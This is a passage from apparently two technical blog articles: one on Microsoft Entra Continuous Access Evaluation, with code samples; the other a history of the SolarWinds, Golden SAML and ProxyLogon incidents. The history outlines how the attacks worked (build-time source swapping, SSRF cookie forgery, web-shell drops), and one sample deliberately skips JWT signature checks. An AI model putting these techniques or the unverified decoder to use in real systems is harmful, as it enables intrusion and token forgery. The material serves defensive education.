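  const params = parseChallenge(wwwAuthenticate);
  if (params.error !== 'insufficient_claims' || !params.claims) return null;
  return decodeClaims(params.claims);
}

// Sample header built locally for the demonstration.
const sampleClaims = { access_token: { nbf: { essential: true, value: '1748600000' } } };
const sampleHeader =
  `Bearer realm="", error="insufficient_claims", claims="${btoa(JSON.stringify(sampleClaims))}"`;

const challenge = extractClaimsChallenge(401, sampleHeader);
console.log(challenge.access_token.nbf.value); // 1748600000
```

The decoded claims are what the client would then supply on its next token request before retrying the original call with the new token.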

{`
// Illustrative: inspect an MSAL JS token-cache entry for the xms_cc capability
// marker. In real apps, MSAL handles capability negotiation; this is for
// educational inspection only.

// A simplified entry modeled on the MSAL JS AccessTokenEntity cache shape
const tokenEntity = {
  homeAccountId: 'abc.def-tenant',
  environment: 'login.microsoftonline.com',
  credentialType: 'AccessToken',
  clientId: '11111111-2222-3333-4444-555555555555',
  tenantId: 'tenant-id',
  target: 'User.Read Mail.Read',
  // expiresOn is up to ~28 hours after cachedAt for CAE-aware sessions
  cachedAt: '1748534400',
  expiresOn: '1748635200', // 28h later
  extendedExpiresOn: '1748635200',
  // Capability declaration the app advertised at acquisition time
  requestedClaims: { xms_cc: ['cp1'] }
};

const ttlSeconds = parseInt(tokenEntity.expiresOn, 10) - parseInt(tokenEntity.cachedAt, 10);
const ttlHours = ttlSeconds / 3600;
const isCaeAware = tokenEntity.requestedClaims
  && tokenEntity.requestedClaims.xms_cc
  && tokenEntity.requestedClaims.xms_cc.some(c => c.toLowerCase() === 'cp1');

console.log('TTL hours:', ttlHours.toFixed(1));
console.log('CAE-aware:', isCaeAware);
// TTL hours: 28.0
// CAE-aware: true
// A TTL above ~1 hour with xms_cc cp1 is a strong indicator the session is
// CAE-aware and Entra issued an extended-lifetime token.
`}

For the custom-API author

This is the hardest path. To make a custom protected API a CAE-aware resource provider today, the first-party Microsoft pathway is not publicly available -- the CAE participation contract for the M365 productivity workloads is internal to Microsoft. The community-canonical implementation pattern is Damien Bowden's damienbod/AspNetCoreMeIDCAE reference repository on GitHub [@damienbod-aspnetcoremeidcae], with an accompanying blog post walkthrough [@damienbod-blog-2022-04]. The repository (initial version April 3, 2022; updated through .NET 10 in late 2025) demonstrates:

The xms_cc=cp1 capability declaration on both the client and the API app registrations.
The Microsoft.Identity.Web claims-challenge handling on the API side.
The Razor Page client flow that catches a 401 with the challenge header and re-acquires the token.

For a fully standards-track pathway, the same custom API can be built as an OpenID SSF receiver consuming CAEP events from any SSF-compliant transmitter, using the RFC 8417 SET envelope over the RFC 8935 push transport [@rfc-8417; @rfc-8935]. Production-grade SSF receiver code is now available in commercial CAEP Hub products (SGNL, TigerIdentity) and a growing set of open-source libraries.
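The receiving end of the RFC 8935 push transport can be sketched as a framework-neutral function. This is an illustration under loud assumptions: `handlePush` and `decodeJwtPayloadUnsafe` are hypothetical names, and the decoder deliberately skips signature verification, which a real receiver must perform against the transmitter's published keys. The 202 acknowledgement and the `err`/`description` error body follow the response contract in RFC 8935.

```javascript
// Decode a JWT payload WITHOUT verifying its signature. Illustration only:
// a real receiver must verify the SET against the transmitter's keys.
function decodeJwtPayloadUnsafe(jwt) {
  const parts = jwt.split('.');
  if (parts.length !== 3) throw new Error('not a compact JWS');
  const base64 = parts[1].replace(/-/g, '+').replace(/_/g, '/');
  const padded = base64 + '='.repeat((4 - (base64.length % 4)) % 4);
  return JSON.parse(atob(padded));
}

// Takes the request's content type and body; returns the status and body
// the push contract calls for.
function handlePush(contentType, body, expectedIssuer) {
  const error = (err, description) => ({ status: 400, body: { err, description } });
  if (contentType !== 'application/secevent+jwt') {
    return error('invalid_request', 'unexpected content type');
  }
  let payload;
  try {
    payload = decodeJwtPayloadUnsafe(body);
  } catch (e) {
    return error('invalid_request', 'SET could not be parsed');
  }
  if (payload.iss !== expectedIssuer) {
    return error('invalid_issuer', 'SET issuer is not a configured transmitter');
  }
  // A real receiver would persist the event here before acknowledging.
  return { status: 202, body: null };
}

// Build an unsigned stand-in for a SET so the example is self-contained.
const toBase64Url = (obj) =>
  btoa(JSON.stringify(obj)).replace(/\+/g, '-').replace(/\//g, '_').replace(/=+$/, '');
const fakeSet = [
  toBase64Url({ alg: 'none' }),
  toBase64Url({ iss: 'https://idp.example.com', jti: 'evt-1', events: {} }),
  'signature-placeholder',
].join('.');

console.log(handlePush('application/secevent+jwt', fakeSet, 'https://idp.example.com').status);     // 202
console.log(handlePush('application/secevent+jwt', fakeSet, 'https://other.example.com').body.err); // invalid_issuer
```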

Note: CAE itself does not require add-on licensing for the basic critical-event evaluation across Microsoft 365 -- it is part of the Entra ID baseline for new tenants. The Microsoft Entra ID Protection feed that drives high user risk detected events, however, requires Microsoft Entra ID P2 (or an equivalent SKU that includes Identity Protection). Confirm current licensing terms in the Microsoft licensing documentation before making procurement decisions; the lower SKUs cover four of the five critical events but not the risk-based one [@ms-cae-concept].

Observability

Sign-in logs and audit logs are where CAE behavior shows up. Look for:

Sign-in logs: filter by signInEventTypes containing CAE-related entries. CAE-aware sign-ins have a different telemetry shape than non-CAE sign-ins.
Token-issuance events: refresh-token issuance against CAE-aware app registrations should show the extended lifetime.
Audit log revocation entries: administrator revocation actions and Identity-Protection-driven revocations appear here; cross-correlate with the resource-provider-side telemetry to validate end-to-end propagation.

Use Microsoft Graph PowerShell to enumerate the tenant's CAE configuration and then trigger a synthetic test: 1) read `Get-MgIdentityConditionalAccessPolicy` to verify the relevant CA policies have CAE enabled in their `SessionControls.ContinuousAccessEvaluation` block; 2) create a test user, sign them in via Outlook on the Web; 3) reset their password via `Update-MgUser`; 4) observe in the audit log that the password reset propagates to a CAE event, and verify in Outlook on the Web that the next refresh surfaces a re-authentication prompt within the 15-minute SLA. This is the simplest end-to-end confidence test that does not require modifying any production resource.

Defaults are good

The most common engineering recommendation here is to leave the defaults alone. CAE on, default tenant settings, current MSAL clients, xms_cc=cp1 on every new app registration. The configuration surface area is small precisely because the design is right: there are not many knobs to turn. The work is in confirming that the client and RP combinations your users actually exercise are CAE-aware, and in monitoring the audit logs to catch drift.
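One way to confirm that a client really is CAE-aware is to check that it can read the claims challenge a resource provider returns alongside a `401`. The sketch below parses a `WWW-Authenticate` header and decodes the challenge. It assumes the challenge arrives as a Bearer challenge with `error="insufficient_claims"` and a base64-encoded `claims` parameter; the function name and the regular expression are illustrative, not part of any library.

```python
import base64
import json
import re
from typing import Optional

# Matches key="value" pairs inside a WWW-Authenticate challenge.
_PARAM = re.compile(r'(\w+)="([^"]*)"')


def parse_claims_challenge(www_authenticate: str) -> Optional[dict]:
    """Return the decoded claims challenge, or None if the header has none.

    ASSUMPTION: the challenge is signalled by error="insufficient_claims"
    and carried in a base64-encoded `claims` parameter.
    """
    params = dict(_PARAM.findall(www_authenticate))
    if params.get("error") != "insufficient_claims" or "claims" not in params:
        return None
    raw = params["claims"]
    # urlsafe_b64decode accepts both base64 alphabets; re-add any stripped padding.
    decoded = base64.urlsafe_b64decode(raw + "=" * (-len(raw) % 4))
    return json.loads(decoded)
```

Current MSAL clients handle this step themselves; the sketch is mainly useful when inspecting captured traffic or testing a custom API that issues challenges.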

That is what to do. The last section is what to remember -- the misconceptions every team carries into a CAE conversation, and the answers that close them.

11. FAQ and Coda

No. The published SLA is up to 15 minutes for the five critical events; only IP-location enforcement is instant. See Section 6 for the mechanical reason for the asymmetry and Section 8 Limit 2 for why 15 minutes is engineering economics rather than a fundamental limit [@ms-cae-concept].

No. CAE addresses *stale authorization* (the original authorization decision is no longer correct), not *stolen tokens* (an attacker is presenting a token that was legitimately issued to someone else). For token theft, use a sender-constrained-token construction: DPoP per RFC 9449 [@rfc-9449-dpop] or mTLS-bound tokens per RFC 8705 [@rfc-8705-mtls]. Both compose cleanly with CAE; a DPoP-bound CAE-aware token is the strongest commonly-deployed combination today, closing both the replay attack surface and the stale-authorization gap.

No. SSF 1.0, CAEP 1.0, and RISC 1.0 were approved as OpenID Foundation Final Specifications on September 2, 2025 -- see Section 4 for the standards-stack treatment [@openid-three-final-specs].

No. MDE and Intune are signal sources into Conditional Access, not CAE-consuming resource providers; see the Section 6 Common-misconception callout for the full distinction and the CAE-aware RP set [@ms-cae-concept].

*Not when the resource provider is CAE-aware.* The token lifetime stops carrying the revocation weight; the channel does. A CAE-aware RP can revoke a 28-hour token within 15 minutes of a critical event, which is a strictly better revocation profile than a 1-hour token with no channel (revocable only at the 1-hour expiry boundary in the worst case) [@ms-cae-concept]. *Yes*, however, when the RP is *not* CAE-aware: the token then carries its full lifetime as the revocation window, and longer is worse. The architectural rule: only issue extended-lifetime tokens to clients whose RPs are CAE-aware -- which is exactly what the `xms_cc=cp1` capability negotiation enforces [@ms-cae-app-resilience].

No. CAE is specific to OAuth 2.0 and OpenID Connect access tokens. SAML assertions have their own lifetime and replay-protection model and are not in scope for the CAE participation contract or for the OpenID SSF/CAEP profiles [@ms-cae-concept; @openid-caep-1_0]. If you are still operating SAML-fronted workloads, the analogous design problem (revocation between sign-in and assertion expiry) is solved differently and is largely a per-product implementation question rather than a standards story.
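The lifetime-versus-channel comparison in the answers above reduces to a short piece of arithmetic. The sketch below is illustrative only: the function name is hypothetical, and it models the worst case as the smaller of the token lifetime and the 15-minute critical-event SLA when the RP is CAE-aware, and as the full token lifetime otherwise.

```python
from datetime import timedelta

# Critical-event SLA quoted in the text.
CAE_CRITICAL_EVENT_SLA = timedelta(minutes=15)


def worst_case_revocation_window(token_lifetime: timedelta,
                                 rp_is_cae_aware: bool,
                                 sla: timedelta = CAE_CRITICAL_EVENT_SLA) -> timedelta:
    """Longest time a revoked user's token can keep working for a critical event."""
    if rp_is_cae_aware:
        # The push channel, not expiry, bounds the window.
        return min(token_lifetime, sla)
    # Without the channel, only expiry ends the token's usefulness.
    return token_lifetime


if __name__ == "__main__":
    print(worst_case_revocation_window(timedelta(hours=28), True))   # 0:15:00
    print(worst_case_revocation_window(timedelta(hours=1), False))   # 1:00:00
    print(worst_case_revocation_window(timedelta(hours=28), False))  # 1 day, 4:00:00
```

The third case is the one the capability negotiation is meant to prevent: a long-lived token presented to an RP that has no revocation channel.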

Coda: the bargain

The OAuth 2.0 designers in 2012 took a deliberate trade: short-lived self-contained tokens were the price they paid to escape the WAM bottleneck. The trade was correct for the web they were designing for. It became wrong the moment enterprises ran compliance-bound SaaS at scale on top of those tokens. Three obvious patches were tried -- the /revoke endpoint, the /introspect endpoint, the short-lifetime experiment -- and each failed for a distinct reason: the wrong party initiates revocation; the AS becomes a per-request critical path; expiry as a blunt instrument creates load and reliability problems while still leaving a window.

What replaced them was an architecture that took two facts seriously. First, revocation has to be push from the IdP to the RP -- not pull from RP to AS, not client-initiated POST to /revoke. Second, expiry and revocation can be separated: once the channel handles revocation, expiry can be measured in days rather than minutes. The 15-minute critical-event SLA and the up-to-28-hour token lifetime are two halves of the same bargain. Microsoft Entra ships them together because they only work together; the OpenID Foundation has standardized the same pattern across vendors because the long tail of SaaS faces the same problem.

The architecture is settled; the adoption is in progress. The CAEP, SSF, and RISC Final Specifications give every SaaS vendor a tractable target. The Microsoft 365 estate is already covered. Cross-vendor receiver coverage is the metric that will decide how much of the 2026 enterprise identity surface actually inherits the bargain -- and that, more than any further protocol work, is the story to watch over the next several years.

The Thirteen Months That Made Zero Trust Unavoidable: The Windows Security Wars Part 5 (2020-2023)

noreply@paragmali.com (Parag Mali) — Wed, 27 May 2026 00:00:00 GMT

Four incidents in thirteen months -- SolarWinds (December 2020), ProxyLogon (March 2021), PrintNightmare (June-July 2021), and Log4Shell (December 2021) -- broke four assumptions the Windows blue team had quietly elevated to invariants: that signed vendor updates are trustworthy, that on-premises server fleets are bounded by the firewall, that legacy SYSTEM services on Domain Controllers are not on the attack surface, and that transitive dependencies are knowable. The architectural pivot was already on the shelf: NIST SP 800-207, *Zero Trust Architecture*, shipped in August 2020, four months before SolarWinds. The defensive primitives that operationalized it -- Microsoft Pluton, the Windows 11 hardware baseline, Conditional Access with Continuous Access Evaluation and the Primary Refresh Token, and the LSA Protection and Vulnerable Driver Blocklist defaults -- shipped at scale through 2022-2023. The trust roots are still not closed; Storm-0558 (July 2023) is the existence proof that the policy engine itself is a privileged plane. That is Part 6.

1. Eighteen Thousand Signatures, All Valid

On December 13, 2020 -- a Sunday -- Mandiant Threat Intelligence pushed a blog post to FireEye's website titled "Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor." The post named a single binary, SolarWinds.Orion.Core.BusinessLayer.dll, that had been digitally signed by SolarWinds' legitimate code-signing certificate and distributed through SolarWinds' own update server between February and June 2020 [@mandiant-sunburst]. The next day, SolarWinds filed a Form 8-K with the U.S. Securities and Exchange Commission stating that the actual number of customers who installed the updates between March and June 2020 was fewer than 18,000 [@solarwinds-sec-edgar].

Two months after that, Microsoft President Brad Smith testified to the U.S. Senate Select Committee on Intelligence that the number of follow-on victims who had been targeted with further lateral movement -- via a token-forgery primitive against Active Directory Federation Services -- was fewer than 100 [@senate-intel-2021-02-23].

The architectural lesson is in the gap between those two numbers. Eighteen thousand endpoints validated the Authenticode signature on a binary [@ms-authenticode], executed it as trusted code, and did exactly what an endpoint protection product is specified to do: nothing, because the binary was signed by a vendor on the trusted publisher list. The attacker then chose roughly one hundred targets to pursue further. The signature was real. The build pipeline that produced the signature was compromised. Ken Thompson's 1983 Turing Award lecture "Reflections on Trusting Trust," published in Communications of the ACM in August 1984, had predicted this exact class thirty-six years earlier [@thompson-1984-acm, @thompson-nakamoto-reading]; in December 2020 the Windows industry collected the receipt.

This is the largest and most sophisticated attack the world has ever seen ... we have seen substantial evidence that points to the Russian foreign intelligence agency, and we have found no evidence that leads us anywhere else. -- Brad Smith, Microsoft President, U.S. Senate Select Committee on Intelligence, February 23, 2021 [@senate-intel-2021-02-23]

SolarWinds was the first of four incidents the Windows blue team did not have a vocabulary for. ProxyLogon arrived in March 2021 and broke the assumption that on-premises Exchange Server fleets were bounded by the corporate firewall. PrintNightmare arrived in June-July 2021 and broke the assumption that legacy services running as SYSTEM on Domain Controllers were not on the attack surface. Log4Shell arrived in December 2021 and broke the assumption that "what software is in my fleet" was an answerable question.

Four incidents. Thirteen months. Four assumptions that the prior decade had quietly elevated to invariants. If the signature was real and the build was compromised, then "protect the endpoint" was protecting the wrong thing. Where did the threat model go?

2. Why 2020 Was the Inflection Point

The four incidents did not happen because 2020 was uniquely insecure. They happened because the structural conditions had been gathering for a decade, and three of them converged that year.

The endpoint-protection era's high-water mark. By 2019, the operational consensus across Windows fleets was that endpoint-centric defense-in-depth had become tractable. Credential Guard (2015) isolated LSASS secrets in a virtualization-based enclave [@ms-credential-guard]. Windows Defender ATP (2016) streamed kernel-level telemetry to a security operations centre. BloodHound (2016) made the on-premises Active Directory graph queryable as attack paths rather than as object permissions [@bloodhound-specterops]. Device Guard and WDAC (2017) constrained kernel and userspace code identity. The threat model was the endpoint. The perimeter was the VPN. The build pipeline was the vendor's problem. The cloud identity layer was Conditional Access on a handful of policies. The blue team's frame of reference was finite and bounded.

Microsoft's 2021 Digital Defense Report framed the post-event detection posture honestly: the industry had become good at finding attackers after the fact, less good at stopping them at first execution [@mddr-2021-specific]. Detection and response as the load-bearing primitive is precisely the posture that SolarWinds invalidated -- because the binary that ran was the one the EDR was specified to trust.

The pandemic-era expansion of the attack surface. From March 2020 onward, remote work shifted authentication to cloud identity providers, exposed VPN and RDP gateways at unprecedented scale, and made internet-facing Exchange near-universal in the mid-market. None of this caused SolarWinds -- the SolarWinds build-pipeline access had begun in September 2019 -- but it reshaped which incidents had the most operational impact when they landed. An Exchange Server fleet that had been ten internal users behind a VPN in 2019 was a hundred external users on the public internet in 2021. ProxyLogon would have been a serious incident in 2019. In 2021 it was a federal emergency.

Supply-chain attack: An attack in which an adversary alters software, hardware, or services *before* the legitimate vendor delivers them, so that the eventual victim trusts the malicious artifact by virtue of trusting the vendor's identity. The compromise can occur at the source (commit signing keys), the build (the compiler or build server), the distribution (the update channel), or the installation (the package manager). SUNBURST was a *build-pipeline* compromise: SolarWinds' source remained clean; the build server inserted SUNBURST code into the compiled artifact, then signed it with SolarWinds' legitimate code-signing certificate.

The state of supply-chain assurance circa 2020. SLSA, the framework that would later codify "what does it mean for a build to be trustworthy" [@google-slsa-2021-06-16, @slsa-v1-levels], did not yet exist; Google announced it in June 2021. Reproducible builds were a research aspiration on a handful of Linux distributions. CycloneDX [@cyclonedx-home] and SPDX [@spdx-home] existed as bill-of-materials specifications but had no federal mandate behind them. in-toto [@in-toto-home] was the only deployed cryptographic-attestation framework for build steps, and adoption was minimal. Executive Order 14028, which would make Software Bill of Materials provision a federal procurement requirement, was still six months away [@eo-14028]. The build pipeline was not threat-modeled as attacker territory because no one had a name for the territory yet.

The same 2020-2023 window also produced a parallel criminal-economy track this article does not walk operationally: the human-operated ransomware cluster of Conti, REvil, DarkSide, and BlackCat / ALPHV, and the supply-chain-adjacent ransomware incidents Colonial Pipeline (May 2021, DarkSide), JBS Foods (May 2021, REvil), and Kaseya VSA (July 2, 2021, REvil). Kaseya is the non-Microsoft supply-chain parallel to SolarWinds: compromise the MSP-tier remote-monitoring platform, and downstream MSPs and their customers receive trojanized commands. The architectural class is not Microsoft-specific [@kaseya-ic3-csa-pdf-substitute]. The canonical primaries are CISA / FBI / NSA / USSS Joint Advisory AA21-265A on Conti [@conti-aa21-265a-wayback], the July 6, 2021 CISA-FBI Kaseya guidance [@kaseya-ic3-csa-pdf-substitute], the April 2022 FBI Flash and CISA alert on BlackCat / ALPHV [@cisa-blackcat-alert-substitute], and the February 2022 US/UK/AU joint ransomware advisory AA22-040A [@cisa-aa22-040a]. Microsoft's canonical framing for "human-operated ransomware" lives in the Digital Defense Report 2022 Cybercrime chapter [@mddr-2022]; readers wanting the operational ransomware-economy treatment should start there.

Taken together, these three threads produced an industry in which the trust-anchor primitives (signed code, perimeter firewalls, default-enabled SYSTEM services, "what library are we using") had all been quietly elevated to invariants while the conditions that made them invariant were eroding. The four incidents are not four bugs; they are four exposures of those four assumptions. The next section walks each in turn.

3. The Four Incidents

3.1 SolarWinds / SUNBURST: Supply Chain at Silicon

Five days before Mandiant published the SUNBURST analysis, FireEye's CEO Kevin Mandia disclosed that "a highly sophisticated state-sponsored adversary" had stolen FireEye's internal Red Team tooling [@mandiant-fireeye-rt-tools]. The disclosure triggered an internal investigation that traced the access path through FireEye's own SolarWinds Orion deployment. By the time Mandiant pushed the December 13 blog, the chain was named, the affected DLL was identified, and the federal response was already moving: CISA's Emergency Directive 21-01 went out the same day, ordering every Federal Civilian Executive Branch agency to disconnect or power down SolarWinds Orion products [@cisa-ed-21-01].

The exploit chain. The SolarWinds build pipeline had been compromised since approximately September 2019, roughly six months before the trojanized builds reached customers [@solarwinds-orange-matter-sunburst]. Between February and June 2020, the SolarWinds release process produced four signed versions of Orion that contained additional code injected during the build itself: the source at rest stayed clean, and the artifact was signed only after the injection. The compromised builds embedded a backdoor Mandiant named SUNBURST inside SolarWinds.Orion.Core.BusinessLayer.dll [@mandiant-sunburst]. SUNBURST was deliberately quiet: it slept for up to two weeks after install, camouflaged its callback traffic as legitimate Orion telemetry, generated its command-and-control hostnames from a domain-generation algorithm rooted at avsvmcloud.com, and ignored any host whose environment matched the attacker's exclusion list (which included most security vendors and some forensic tooling). On selected targets, the attacker deployed a second-stage loader, TEARDROP [@mandiant-sunburst] or its variant Raindrop [@symantec-raindrop-2021], to run a Cobalt Strike beacon, and from there pursued domain compromise of the on-premises Active Directory.

SUNSPOT: the build-time injector. Mandiant's December 13 post named the SUNBURST artifact but did not yet describe how the trojanized DLL got into the build. On January 11, 2021, CrowdStrike Intelligence published an analysis of the injector itself, codenamed SUNSPOT, alongside SolarWinds' own root-cause investigation update [@crowdstrike-sunspot, @solarwinds-orange-matter-sunburst]. SUNSPOT was a Windows binary present on the SolarWinds build server as taskhostsvc.exe. It monitored running processes for MsBuild.exe, walked the new process's environment to find the directory of the Orion Visual Studio solution, located the source file InventoryManager.cs, replaced its contents on disk with a SUNBURST-bearing version just before the C# compiler read the file, waited for the build to finish, then atomically restored the original file. Because the substituted file existed on disk only in the narrow window between MsBuild starting and the build finishing, the source repository at rest never showed evidence. The artifact on disk after the build looked exactly like the artifact a clean build would have produced -- except that the compiled bytes embedded SUNBURST.
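The timing property described above can be made concrete with a small integrity check. The sketch below is a hypothetical illustration, not a description of any tooling SolarWinds or CrowdStrike used: it records SHA-256 hashes of source files from a trusted checkout and reports any file whose bytes differ later. The function names and the `*.cs` pattern are assumptions for the example.

```python
import hashlib
from pathlib import Path


def build_manifest(root: Path, pattern: str = "*.cs") -> dict:
    """Map each matching file (relative POSIX path) to the SHA-256 of its bytes."""
    return {
        path.relative_to(root).as_posix(): hashlib.sha256(path.read_bytes()).hexdigest()
        for path in sorted(root.rglob(pattern))
    }


def tampered_files(root: Path, manifest: dict, pattern: str = "*.cs") -> list:
    """Return files that were added, removed, or changed relative to the manifest."""
    current = build_manifest(root, pattern)
    names = manifest.keys() | current.keys()
    return sorted(name for name in names if manifest.get(name) != current.get(name))
```

Run before the build and again after it, this check would have reported nothing, because the original file was restored once the build finished. It only catches the substitution if it runs while the build is in progress, which is why hashing the inputs at the moment the compiler consumes them matters more than hashing the repository at rest.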

SUNSPOT: The build-time injector CrowdStrike identified as the SolarWinds-side companion to SUNBURST [@crowdstrike-sunspot]. SUNSPOT is the operational realization at production scale of the threat model Ken Thompson described in 1984: the build process is the trust boundary, and an attacker who controls the build process produces an artifact whose signature is correct but whose semantics are not what the source code says.

The on-premises compromise was the means. The cloud pivot was the end. Once the attacker controlled the on-premises ADFS server's token-signing private key, the chain shifted to Golden SAML.

Golden SAML: A token-forgery technique introduced by Shaked Reiner of CyberArk Labs in November 2017 [@reiner-2017-cyberark]. If an attacker obtains the token-signing private key of a SAML 2.0 identity provider (typically the on-premises Active Directory Federation Services token-signing certificate), the attacker can forge a SAMLResponse for any user, with any group memberships, valid for any duration. Service providers that trust the federation cannot distinguish forged tokens from legitimate ones. Reiner published a reference implementation called `shimit` alongside the disclosure [@cyberark-shimit-gh]. The naming is a deliberate parallel to Mimikatz's Golden Ticket against Kerberos.

SUNBURST: The first-stage backdoor that Mandiant identified inside `SolarWinds.Orion.Core.BusinessLayer.dll` in December 2020 [@mandiant-sunburst, @solarwinds-sec-edgar]. SUNBURST established initial command and control over HTTPS, blending into the volume of telemetry that legitimate Orion deployments generated.

sequenceDiagram
    participant SUNSPOT as SUNSPOT on SolarWinds build server
    participant Build as SolarWinds MsBuild process
    participant Customer as Customer Orion Server
    participant C2 as avsvmcloud DGA C2
    participant ADFS as On-prem ADFS
    participant M365 as Microsoft 365
    SUNSPOT->>Build: Replace InventoryManager.cs at compile time
    Build->>Customer: Signed Orion update with SUNBURST DLL
    Customer->>Customer: Authenticode validates signature, executes
    Customer->>C2: HTTPS beacon disguised as Orion telemetry
    C2->>Customer: TEARDROP or Raindrop second-stage loader
    Customer->>ADFS: Lateral movement, extract token-signing key
    ADFS->>ADFS: Attacker forges SAMLResponse offline
    ADFS->>M365: Golden SAML token for chosen identity
    M365->>M365: Federated trust accepts forged assertion
    Note over Customer,M365: Approximately 100 targeted follow-on victims out of 18,000 SUNBURST recipients

Blast radius. SolarWinds' December 14 Form 8-K stated that fewer than 18,000 customers installed the trojanized updates between March and June 2020 [@solarwinds-sec-edgar]. Brad Smith's February 23 Senate testimony placed the count of follow-on victims pursued via lateral movement at fewer than 100 [@senate-intel-2021-02-23]. On April 15, 2021, the White House formally attributed the operation to the Russian Foreign Intelligence Service (SVR), with coincident sanctions and the expulsion of ten Russian diplomats [@wh-fact-sheet-svr-attribution]. The activity cluster Mandiant had originally tracked as UNC2452 was merged into APT29 in May 2022 [@mandiant-apt29-merge]; Microsoft's Nobelium designation was retired on April 18, 2023 in favor of "Midnight Blizzard" under the new weather-themed actor-naming scheme [@ms-actor-naming-2023].

The renaming pile-up matters operationally. Detection rules written against "UNC2452" in early 2021, against "APT29" after May 2022, and against "Midnight Blizzard" after April 2023 all reference the same actor cluster, but tooling and queries that anchor on a single name miss the others. Mandiant's SUNBURST countermeasure repository preserves the original IOCs [@mandiant-sunburst-countermeasures-gh].

Vendor response and federal action. CISA's January 8, 2021 Cybersecurity Advisory AA21-008A was the first federal advisory to name forged authentication tokens, federated identity bypass, and cloud-side persistence as a coherent detection priority [@cisa-aa21-008a]. CISA released an open-source detection tool, Sparrow, with the advisory. SolarWinds shipped Orion 2020.2.1 HF 2 as the hotfix sequence. The April 13, 2021 Department of Justice action against ProxyLogon web shells (covered in the next subsection) and the April 15 White House attribution and sanctions package effectively closed the public-sector response cycle within four months of the December 13 disclosure.

In his 1983 Turing Award lecture, published in *Communications of the ACM* in August 1984, Ken Thompson described a self-referential modification to a compiler that produced a backdoor in any program the compiler subsequently compiled, including future copies of the compiler itself [@thompson-1984-acm, @thompson-nakamoto-reading]. The construction has a property that is easy to state and hard to confront: no amount of source-code auditing reveals the backdoor, because the backdoor is not in any source code. It is in the compiler's behavior.

SUNBURST is not the same construction. The compromise was at the build server rather than the compiler, and the attacker's code was added to the artifact rather than inserted by a self-replicating modification. The relevant similarity is architectural rather than mechanical. In both cases the trust anchor (the compiler in Thompson's lecture, the publisher's code-signing certificate in SUNBURST) was doing exactly what it was specified to do. The auditor of a backdoored binary cannot find the backdoor in the source. The customer of a backdoored vendor cannot find the backdoor in the signature. The chain of evidence is intact at the level the verifier is checking; the failure is at a level the verifier was never specified to check.

Thompson's closing sentence -- "You can't trust code that you did not totally create yourself" -- reads in 1984 as a thought experiment and in 2020 as an operational claim about the build pipelines of every software vendor in the Authenticode trust list.

Key idea: Signed code from your vendor is not trustworthy if your vendor's build pipeline is compromised. Authenticode signs the publisher's binary; it does not sign the build that produced the binary. The eighteen thousand SUNBURST recipients did exactly what their endpoints were specified to do.

If the entry was a signed update from a trusted vendor, the entry was inside the perimeter before the perimeter was tested. The second incident showed what happens when the entry is the perimeter.

3.2 HAFNIUM / ProxyLogon: The Front-End That Pre-Authenticated for the Back-End

Two independent researcher pipelines converged on the same Exchange vulnerability chain within days of each other in January 2021. Volexity's Steven Adair and team observed exploitation activity against customer Exchange Server deployments as early as January 6, 2021 -- a date Volexity later revised to January 3, 2021 in their March 8 update to "Operation Exchange Marauder" [@volexity-exchange-marauder]. Both January dates are earliest-observed exploitation dates, not detection or zero-day-identification dates; the chain was already in operator hands when Volexity's customer-side incident-response telemetry surfaced it. DEVCORE's Cheng-Da "Orange Tsai" Tsai arrived at the same chain independently through code review and reported it to MSRC on January 5 [@orange-tsai-proxylogon]. Both reports landed at Microsoft Security Response Center; both researchers held the disclosure as MSRC worked on a patch. On March 2, 2021 -- a Tuesday, but not a Patch Tuesday -- Microsoft shipped out-of-band updates for all supported Exchange Server versions [@msft-hafnium-blog].

The exploit chain. The audit-correct shape of the chain is three CVEs, not four. CVE-2021-26855 is a server-side request forgery in the Exchange Server front-end that allows an unauthenticated attacker to send requests to the back-end as if the requester were Exchange itself [@nvd-cve-2021-26855]. CVE-2021-27065 is a post-authentication arbitrary file write that the attacker reaches via the SSRF, allowing an attacker-chosen ASPX web shell to be written to a server-controlled directory [@tenable-exchange-zd]. The shell then executes under the Exchange process identity, which is SYSTEM. A separate file-write primitive (CVE-2021-26858) provides a parallel path to the same web-shell drop after authentication.

Server-side request forgery (SSRF): A class of vulnerability in which an attacker induces a server to issue requests on the attacker's behalf, typically to internal resources that the attacker could not reach directly. CVE-2021-26855 was an SSRF in the Exchange Server front-end (the Client Access role): a forged X-AnonResource-Backend cookie caused the front-end to proxy attacker-supplied requests to the Exchange back-end with the proxy's own authentication context, bypassing the Exchange authentication boundary entirely.

CVE-2021-26857 sits in a parallel position. It is an insecure deserialization in Exchange's Unified Messaging service that yields code execution as SYSTEM to any authenticated user [@tenable-exchange-zd]. It does not require the SSRF step. Treating ProxyLogon as a single linear chain of four CVEs is the common simplification; the audit-correct framing is three CVEs in the linear SSRF-to-web-shell path and one separate authenticated RCE primitive in a parallel position.

Note: The "four chained zero-days" shorthand collapses two distinct attack-class shapes and obscures the SSRF-as-load-bearing-primitive observation. The chain that proxies through 26855 does not pass through 26857; 26857 was an independent RCE primitive available to attackers who already held any Exchange-authenticated identity, which is a different threat-model class from the pre-auth SSRF.

flowchart TD
    A[Unauthenticated attacker] --> B[CVE-2021-26855 SSRF on front-end]
    B --> C[Forged backend-auth cookie]
    C --> D[CVE-2021-27065 or CVE-2021-26858 arbitrary file write]
    D --> E[ASPX web shell on disk]
    E --> F[SYSTEM-level RCE]
    subgraph Parallel
        G[Authenticated user] --> H[CVE-2021-26857 Unified Messaging deserialization]
        H --> F
    end
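The two attack shapes described above can also be modelled as a small directed graph, which makes the "three CVEs plus one parallel primitive" framing checkable. This is a sketch for illustration: the node labels and the `paths` helper are hypothetical names, and the edges simply restate the chain as this section describes it.

```python
# Directed edges restating the chain as described in this section.
EDGES = {
    "Unauthenticated attacker": ["CVE-2021-26855 SSRF"],
    "CVE-2021-26855 SSRF": ["Forged backend-auth cookie"],
    "Forged backend-auth cookie": ["CVE-2021-27065 file write",
                                   "CVE-2021-26858 file write"],
    "CVE-2021-27065 file write": ["ASPX web shell"],
    "CVE-2021-26858 file write": ["ASPX web shell"],
    "ASPX web shell": ["SYSTEM-level RCE"],
    "Authenticated user": ["CVE-2021-26857 deserialization"],
    "CVE-2021-26857 deserialization": ["SYSTEM-level RCE"],
}


def paths(start: str, goal: str, edges: dict = EDGES) -> list:
    """Enumerate every path from start to goal in an acyclic edge map."""
    if start == goal:
        return [[start]]
    found = []
    for nxt in edges.get(start, []):
        for tail in paths(nxt, goal, edges):
            found.append([start] + tail)
    return found


if __name__ == "__main__":
    for route in paths("Unauthenticated attacker", "SYSTEM-level RCE"):
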